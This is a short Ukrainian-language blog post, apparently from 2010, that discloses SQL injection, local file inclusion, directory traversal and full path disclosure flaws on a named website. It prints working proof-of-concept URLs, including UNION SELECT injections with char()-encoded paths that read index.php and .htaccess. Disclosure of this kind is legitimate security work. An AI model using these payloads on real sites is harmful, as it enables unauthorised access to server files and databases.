Уразливості на www.lanukr.com
15:11 25.10.201005.02.2010
У червні, 28.06.2009, я знайшов SQL Injection, Local File Inclusion, Directory Traversal та Full path disclosure уразливості на сайті http://www.lanukr.com. Про що найближчим часом сповіщу адміністрацію сайта.
Детальна інформація про уразливості з’явиться пізніше.
25.10.2010
SQL Injection:
http://www.lanukr.com/?mid=-1%20or%20version()%3E4
http://www.lanukr.com/?fun=-1%20or%20version()%3E4
Local File Inclusion (через SQL Injection):
http://www.lanukr.com/?fun=-1%20union%20select%201,0,char(46,46,47,105,110,100,101,120,46,112,104,112),1
Включення index.php.
Directory Traversal (через SQL Injection):
http://www.lanukr.com/?fun=-1%20union%20select%201,0,char(46,46,47,46,104,116,97,99,99,101,115,115),1
Виведення .htaccess.
Full path disclosure:
http://www.lanukr.com/?fun=-1
Дані уразливості вже виправлені, за виключенням Full path disclosure. Але дірок на сайті все ще чимало.